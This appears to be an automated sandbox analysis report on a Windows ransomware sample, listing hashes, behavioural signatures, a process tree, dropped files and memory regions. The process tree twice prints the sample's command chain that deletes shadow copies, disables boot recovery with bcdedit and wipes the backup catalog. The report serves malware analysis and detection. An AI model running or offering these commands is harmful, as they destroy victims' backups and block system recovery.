Analysis

  • max time kernel
    131s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250502-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250502-enlocale:en-usos:windows10-2004-x64system
  • submitted
    19/05/2025, 14:51

General

  • Target

    2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe

  • Size

    197KB

  • MD5

    b35a7c0c23349c34d7eaa11be87681b3

  • SHA1

    265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8

  • SHA256

    c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c

  • SHA512

    67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

  • SSDEEP

    3072:zQ7pevne/DLB5w20WLjF72xnEt44etrlV9Yl4cqnj:zQ7peve/DLB56gF72CW4etrlV9m4

Malware Config

Signatures

  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (67) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Drops file in Drivers directory 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops desktop.ini file(s) 20 IoCs
  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 2 IoCs
  • NTFS ADS 1 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-05-19_b35a7c0c23349c34d7eaa11be87681b3_elex_ngrbot_wannacry.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Adds Run key to start application
    • Drops desktop.ini file(s)
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4160
    • C:\Windows\SysWOW64\NOTEPAD.EXE
      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt
      2⤵
      • System Location Discovery: System Language Discovery
      • Opens file in notepad (likely ransom note)
      PID:4376
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:956
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:4644
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "
      2⤵
      • System Location Discovery: System Language Discovery
      • NTFS ADS
      PID:3080
  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\discord.exe
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1712
    • C:\Users\Admin\AppData\Local\discord.exe
      C:\Users\Admin\AppData\Local\discord.exe
      2⤵
      • Drops file in Drivers directory
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops desktop.ini file(s)
      • Sets desktop wallpaper using registry
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:1148
      • C:\Windows\SysWOW64\NOTEPAD.EXE
        "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\APEXNOTE.txt
        3⤵
        • System Location Discovery: System Language Discovery
        • Opens file in notepad (likely ransom note)
        PID:3292
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic shadowcopy delete
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:4212
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\usb_maker.bat" "
        3⤵
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        PID:5032
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
      PID:3568

    Network

          MITRE ATT&CK Enterprise v16

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\discord.exe

            Filesize

            197KB

            MD5

            b35a7c0c23349c34d7eaa11be87681b3

            SHA1

            265a3a1b889a9f3f5bb53f9e5d1cbc7f48d24fe8

            SHA256

            c032b020f742add231aa1b02c90240cc702d81ccd255c015284c1389ef1e7b6c

            SHA512

            67a8c9eb39da8f24a48acee027706052d68b59cbad05e9028bafb70ba77a562c8ae1b72c375bcd03ea1846775c577bff005ed148ba8dd0963673c91144846dd2

          • C:\Users\Admin\AppData\Roaming\ID

            Filesize

            40B

            MD5

            ff1447561eae283bddeb71e3ea3168cb

            SHA1

            3399abb7e65489ccddc2118079c1ec2ce2f5404f

            SHA256

            915cd36509e6360c2e35301430765ddc70a37057109c4806c7837452431d8b02

            SHA512

            7e50186680e387a137c67f247201afe5809891050784a15ca510435e40947de6f3efb07db5e921bfda94a3e26927b2b833cdf4d1b66a3d7400d7fe3453aa7bad

          • C:\Users\Admin\AppData\Roaming\fondo_antiguo.jpg

            Filesize

            24KB

            MD5

            25342190bcc364d32b9e9f9928b5a8a5

            SHA1

            3ae3bdabaed70dba1fd96c0be72e17aa91c7802a

            SHA256

            d626e482d44f5fc8eb1c9b2cd08070150ab99afe40cf6dc939015b01b09088f4

            SHA512

            c0f4f1831f289d4d60e9323e36689c2e0aaa9a7de3dbe4e65b2974d26d3f6f480a7160f5eff2ad458f8b0a7f36057bfba9c7a1b62769091b02640176bd2e53c3

          • C:\Users\Admin\AppData\Roaming\usb_maker.bat

            Filesize

            1KB

            MD5

            2e8e30afd640ba60cee4644e27efecf2

            SHA1

            31f6a7727c6b40419715b769d6a60b3872868b5b

            SHA256

            034c79570dc0d54160ed0d3b4435bf4fdcae10a0d2ab688348f112f399d6ea14

            SHA512

            052401dbc296664301a8b0522296c3af22ddc1b36d3e782bcda2709b20aa47085cdf080bb536c34533c1d595768e21035112060f3672e3b82d5e23001c41f76b

          • C:\Users\Admin\Downloads\APEXNOTE.txt

            Filesize

            800B

            MD5

            bdba72b1177bdfc5dee1d9941fdcae45

            SHA1

            a7713959c8f0a6d8d7a6169665e87b009ac04b10

            SHA256

            dd1e78ae51782f025cad303019e331c493d20bc0f7f71c0c186a85be24ee13be

            SHA512

            3eca03cd090b483beb4e2009a535905ce6ac8100782f46dd681db1e2e25960cd854d303f2820225581b6e25a89925f0199fa022887a5c3c59f53297eb0884b5a

          • C:\Users\Admin\Pictures\imagexSIxnnbNiOVYwyIIHwotgPgRNKhzjW.jpg

            Filesize

            95KB

            MD5

            23dcba6ae05640c3c9c1621cd9f4cd7f

            SHA1

            0b6ecd44bac5a58ba27dfdb26d9a8759723f1e3f

            SHA256

            f7fc0500d8f3b0596e080a801561a86ce76670e85461c9a56537a011dbd595b0

            SHA512

            11ac6c8fc9c45043757b7e0c2c9704c5ef75bd7b80794dbf0eea0a3c0d672164feb6e56d5685e4b8ef7c629394526794a9f32e0d093c6ffbfd7e3520002da18b

          • C:\Windows\System32\drivers\etc\hosts

            Filesize

            3KB

            MD5

            de941294418545204a4ec21837641098

            SHA1

            5b6c90046d37841e0096b1f85d021836f2b09639

            SHA256

            1d7320e6895f426fe4f7bf535b0a63e8308202a6d1a7b790498c45ad5fc58cea

            SHA512

            fcecb0fee780eda474576afb6fa799fadb5a82d1eb725f93bdcdc4bd7617361f254d03510cbb7f50b1f056e15dd51f56d4a5027e21b4d6289a5e283e0a6b0daf

          • memory/1148-26-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/1148-23-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/1148-331-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/4160-0-0x000000007477E000-0x000000007477F000-memory.dmp

            Filesize

            4KB

          • memory/4160-5-0x0000000005970000-0x000000000597A000-memory.dmp

            Filesize

            40KB

          • memory/4160-4-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB

          • memory/4160-3-0x0000000005830000-0x00000000058C2000-memory.dmp

            Filesize

            584KB

          • memory/4160-2-0x0000000005D00000-0x00000000062A4000-memory.dmp

            Filesize

            5.6MB

          • memory/4160-1-0x0000000000E10000-0x0000000000E48000-memory.dmp

            Filesize

            224KB

          • memory/4160-333-0x0000000074770000-0x0000000074F20000-memory.dmp

            Filesize

            7.7MB